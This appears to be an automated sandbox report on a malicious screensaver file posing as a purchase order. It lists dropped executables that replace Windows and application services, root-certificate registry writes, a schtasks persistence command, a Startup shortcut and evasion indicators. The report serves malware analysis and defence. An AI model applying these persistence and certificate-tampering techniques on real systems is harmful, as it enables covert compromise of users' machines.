                  Source: Binary string: FXSSVC.pdbH source: armsvc.exe, 0000000B.00000003.418018700.0000000002220000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.418338317.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: armsvc.exe, 0000000B.00000003.469285797.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.479538599.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.11.dr
                  Source: Binary string: t:\setupexe\x64\ship\0\setup.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: VSTOInstaller.pdb source: armsvc.exe, 0000000B.00000003.577349873.0000000001480000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.577330836.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: dllhost.pdb source: armsvc.exe, 0000000B.00000003.406747169.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.411082101.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.406378900.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \ship\0\msohtmed.exe\bbtopt\msohtmedO.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\tnameserv_objs\tnameserv.pdb source: armsvc.exe, 0000000B.00000003.532521819.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WMPNetwk.pdb source: armsvc.exe, 0000000B.00000003.490450790.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.498920191.0000000001C80000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\misc_hev\x86\ship\0\msohtmed.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: SearchIndexer.pdb source: armsvc.exe, 0000000B.00000003.513401630.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, SearchIndexer.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\kinit_objs\kinit.pdb source: armsvc.exe, 0000000B.00000003.527765459.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: armsvc.exe, 0000000B.00000003.581129841.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ieetwcollector.pdb source: armsvc.exe, 0000000B.00000003.423169335.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.423336271.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: armsvc.exe, 0000000B.00000003.528742519.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, OSE.EXE.11.dr
                  Source: Binary string: PerfHost.pdb source: armsvc.exe, 0000000B.00000003.442858130.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.441621041.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.441414190.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dw20.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\orbd_objs\orbd.pdb source: armsvc.exe, 0000000B.00000003.528293885.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 0000000B.00000003.488416552.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vds.pdbH source: armsvc.exe, 0000000B.00000003.453316185.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.449463705.0000000002220000.00000004.00001000.00020000.00000000.sdmp, vds.exe.11.dr
                  Source: Binary string: wbengine.pdb@SH source: armsvc.exe, 0000000B.00000003.469285797.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.479538599.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.11.dr
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb D source: OSE.EXE.11.dr
                  Source: Binary string: \ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb? source: powershell.exe, 00000010.00000002.403965054.0000000005058000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: i0C:\Windows\mscorlib.pdb source: hVVSnrrP.exe, 00000035.00000002.548197085.0000000000678000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdb source: armsvc.exe, 0000000B.00000003.430102360.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.429418798.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msdtc.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\keytool_objs\keytool.pdb source: armsvc.exe, 0000000B.00000003.527614057.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.403965054.0000000005058000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 86\ship\0\wkconv.exe\bbtopt\wkconvO.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmid_objs\rmid.pdb source: armsvc.exe, 0000000B.00000003.528636073.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 0000000B.00000003.421750632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java-rmi_objs\java-rmi.pdb source: armsvc.exe, 0000000B.00000003.523640565.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mscorsvw.pdb source: armsvc.exe, 0000000B.00000003.393419599.0000000001B70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.403111110.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.405006368.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.395627106.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.389710168.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.394676525.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.402917632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\policytool_objs\policytool.pdb source: armsvc.exe, 0000000B.00000003.528519701.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: armsvc.exe, 0000000B.00000003.444842807.0000000001F40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444694493.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445682403.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444714229.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444889546.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444863016.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444876161.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444772908.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445599387.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ieetwcollector.pdbH source: armsvc.exe, 0000000B.00000003.423169335.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.423336271.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\toolkit\components\maintenanceservice\maintenanceservice.pdb source: armsvc.exe, 0000000B.00000003.428010284.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ehRecvr.pdb source: armsvc.exe, 0000000B.00000003.412276451.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: y\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, OSE.EXE.11.dr
                  Source: Trading_AIBot.exe.8.drStatic PE information: 0xAA16B5AE [Fri Jun 4 22:50:22 2060 UTC]
                  Source: armsvc.exe.8.drStatic PE information: section name: .didat
                  Source: elevation_service.exe.11.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe.11.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe.11.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe.11.drStatic PE information: section name: .voltbl
                  Source: elevation_service.exe.11.drStatic PE information: section name: _RDATA
                  Source: PO#_1100015533.scrStatic PE information: section name: .text entropy: 7.87067678928939
                  Source: hVVSnrrP.exe.0.drStatic PE information: section name: .text entropy: 7.87067678928939
                  Source: SearchIndexer.exe.11.drStatic PE information: section name: .reloc entropy: 7.935204414694247
                  Source: ehrecvr.exe.11.drStatic PE information: section name: .reloc entropy: 7.940817120841736
                  Source: FXSSVC.exe.11.drStatic PE information: section name: .reloc entropy: 7.93155292375944
                  Source: elevation_service.exe.11.drStatic PE information: section name: .reloc entropy: 7.943546715640478
                  Source: sppsvc.exe.11.drStatic PE information: section name: .reloc entropy: 7.935823751154218
                  Source: VSSVC.exe.11.drStatic PE information: section name: .reloc entropy: 7.924765150393403
                  Source: wmpnetwk.exe.11.drStatic PE information: section name: .reloc entropy: 7.917500544087672
                  Source: wbengine.exe.11.drStatic PE information: section name: .reloc entropy: 7.926522643506996

                  Persistence and Installation Behavior

                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\ehome\ehsched.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSystem file written: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSystem file written: C:\Windows\System32\alg.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\dllhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\ieetwcollector.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\sppsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exe
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehsched.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Windows\System32\alg.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehrecvr.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Local\Temp\Microsofts.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\dllhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\ieetwcollector.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\sppsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
                  Source: C:\Windows\System32\msdtc.exeFile created: C:\Windows\DtcInstall.log

                  Boot Survival

                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\Names

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackup
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: armsvc.exe, 0000000B.00000003.513459460.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, SearchIndexer.exe.11.dr Binary or memory string: FHTTPHTTPSFILEUNKNOWN%LS\%LSSOFTWARE\MICROSOFT\WINDOWS SEARCH\TRACING\EVENTTHROTTLELASTREPORTEDSOFTWARE\MICROSOFT\WINDOWS SEARCH\TRACINGEVENTTHROTTLEMAXEVENTSEVENTTHROTTLEMAXCONTROLPERIODMSEVENTTHROTTLEBLOCKPERIODMSEVENTTHROTTLEFLUSHPERIODMSMSFTE.DLLMSTRACER.DLL
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 200000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 2500000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 350000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 7FC0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 5C60000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 8FC0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 9FC0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: A6F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: B6F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: C6F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 28C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 2FA0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr Memory allocated: 2C50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 5D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 22D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 640000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 5AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 6AA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 6BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 7BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 85B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 95B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: A5B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: B5B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2270000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 450000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 5400000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2D400000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Memory allocated: 1C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Memory allocated: 2690000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe Memory allocated: 340000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: 2C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: 22D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Memory allocated: 5B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 28A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 2ED0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe Memory allocated: 29E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PO#_1100015533.scr | Thread delayed: delay time: 922337203685477
